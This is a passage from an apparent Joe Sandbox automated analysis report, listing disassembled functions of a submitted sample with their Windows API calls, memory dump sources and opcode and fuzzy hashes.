                                                                                        • Opcode ID: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                        • Instruction ID: 29b4cb72f5695f91d94a7ef1c25683564af1a02222b3be54a1f39fd7af1b1a4c
                                                                                        • Opcode Fuzzy Hash: 9fc3da6cb256e5abfc21603a5e3828836bf47fe0a5eb15fa20f70794a3a4e2cf
                                                                                        • Instruction Fuzzy Hash: 07016537D00528ABCF23ABA8CD91ADEB735AF89750F05C516E816BF256DA348D04C6A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0038B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038B177
                                                                                        • _free.LIBCMT ref: 0038C4E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                        • Instruction ID: c8ec40f95866fe3ef3643523b7f601a115fc60bb26227319518f0373321ffe3c
                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                        • Instruction Fuzzy Hash: 880126722003056BE7329F668885A6AFBEDEB85330F26055DE18487281EA30A845C734
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00389813,00000001,00000364,?,003840EF,?,?,003A1098), ref: 0038B177
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 00d00f84d757f2b00a14defb54be6e1f55f053166ced753a5ad6c3313ffc1249
                                                                                        • Instruction ID: 7969b3f69729fb4a1bd905cd432be6d37d2c60d1265d3d5f7bb651ebeafa3e4a
                                                                                        • Opcode Fuzzy Hash: 00d00f84d757f2b00a14defb54be6e1f55f053166ced753a5ad6c3313ffc1249
                                                                                        • Instruction Fuzzy Hash: 8FF0B43254532667DB277B21AC1EB6FB758AB41760B198192B8089E190CB60D90183E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00383C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00383C3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
                                                                                        • Instruction ID: e2577761f3cc48dd79a4c6a910ad1bb55afc80913deeecc9eb0e40b8379de56f
                                                                                        • Opcode Fuzzy Hash: 7a657743698b93111bcbe0e57760f5abb743aceaf02efd9e3b4800ebd7dd8163
                                                                                        • Instruction Fuzzy Hash: BDF08C322003169F8F13AEA8EC0099A77A9BF01F207104165FA06E6290DB31EA20C790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00388E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00384286,?,0000015D,?,?,?,?,00385762,000000FF,00000000,?,?), ref: 00388E38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                        • Instruction ID: cd6b4acd31763c7ea857ba89a8a5af2a60ae2aaa5d952c7de696a99f0ea06c30
                                                                                        • Opcode Fuzzy Hash: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                        • Instruction Fuzzy Hash: F9E0ED3124672556EA7337719C09BAB768C9F813A0FA601E1BC089A491CF60ED0083E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00365ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00365AC2
                                                                                          • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                        • Instruction ID: 57686d49781795d4acdf08ef2f55a61fa712c4e158372675656baec87a30fd47
                                                                                        • Opcode Fuzzy Hash: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                        • Instruction Fuzzy Hash: E801A430410790DAD72AE7B8C0517DDFBE4DF59304F50C48DA45A57283CBB81B08D7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                        • Instruction ID: 441de211ebd2e385ae111f729651c0af9a128463dce77d7bec79bb05bc7f5729
                                                                                        • Opcode Fuzzy Hash: cfd5e7fc5e03ad587e48bb7504521719934188e4c0defdcbef0bb462ea8b0268
                                                                                        • Instruction Fuzzy Hash: 17F08270481B15DFDB328B64C459B92B7ECAB12335F049B1FD0E7439E4D771698D8A50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                          • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                          • Part of subcall function 0036A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                        • Instruction ID: 96d459b21b0f48c66d31e0d159c861ba29f18859239c04a427e9dae86f86f089
                                                                                        • Opcode Fuzzy Hash: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                        • Instruction Fuzzy Hash: DEF05431008B90AACA2367B489047C7BB945F17321F04CA4DF1FA6619AC26550989F23
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00370E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00370E3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecutionStateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2211380416-0
                                                                                        • Opcode ID: 55bce2f24bfca7fd0d1606c2d4ee8572ca0c0c3f1c01617e92494a7b9afd8767
                                                                                        • Instruction ID: 7d4a6f3cfffe9baf89a15e1b53113ef8aaccb58b1d3b3344e5429f1179e87102
                                                                                        • Opcode Fuzzy Hash: 55bce2f24bfca7fd0d1606c2d4ee8572ca0c0c3f1c01617e92494a7b9afd8767
                                                                                        • Instruction Fuzzy Hash: 95D0121560145456DA37732C68567FE350A8FC7351F0D8066B14D6F686CA5D4886A261
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                          • Part of subcall function 0037A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                        • String ID:
                                                                                        • API String ID: 1915507550-0
                                                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction ID: e0e7f04f156f40a62237deca0e83a9142f32b0b418472d496327d8b291e1416f
                                                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                        • Instruction Fuzzy Hash: 59D0C97121460DBAEF636F618C1296E7A99EB80340F04C125B84AD9191EAB9DA10EA62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00371B3E), ref: 0037DD92
                                                                                          • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                          • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                          • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010420,?), ref: 0037B59E
                                                                                          • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                          • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 897784432-0
                                                                                        • Opcode ID: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                        • Instruction ID: ee75ec9fc387abbba984c31d28b872dda9580f5d552919ba45765d3779911914
                                                                                        • Opcode Fuzzy Hash: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                        • Instruction Fuzzy Hash: FED09E32144300BAD6132B51CD06F0E7AB6AB89B08F008954B288740B1CA72AD31DB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DloadProtectSection.DELAYIMP ref: 0037E5E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2203082970-0
                                                                                        • Opcode ID: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                        • Instruction ID: 4deacd0ad87eb9b31513ee87a51207aa9280bf6a8f12d191f6868a588fb53902
                                                                                        • Opcode Fuzzy Hash: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                        • Instruction Fuzzy Hash: 18D0C9B01802809AD637EBA89886B583258BB2EB14F94C1A5F14DD9492DA6C9491E70A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003698BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileType.KERNELBASE(000000FF,003697BE), ref: 003698C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                        • Instruction ID: 9268aa04dce8aef46cdbc0d17eb6373e4d9e4a5353dc4f1f7188a11b2fae682c
                                                                                        • Opcode Fuzzy Hash: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                        • Instruction Fuzzy Hash: 16C01238400205C68E228B249848199736AAA533A6BB5E696C029CA0A5C333CC8BEA01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                        • Instruction ID: 7529d0dffd46a62389348039ad443c5b1ce1aa613dea6cc21d3da9c239d63c93
                                                                                        • Opcode Fuzzy Hash: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                        • Instruction Fuzzy Hash: F9B012FB268010FC3217E1051C02E37021CC0C8F10330D06EF82DC5480D8484E000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                        • Instruction ID: da0bbaa1a40f37d6217a6179d1184094eb5a2d79eab332ef431174c10b935ce0
                                                                                        • Opcode Fuzzy Hash: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                        • Instruction Fuzzy Hash: 72B012EA268010BC3217A1051D02E77021CC4C8F10330D06EF52DC5480D8440C091533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
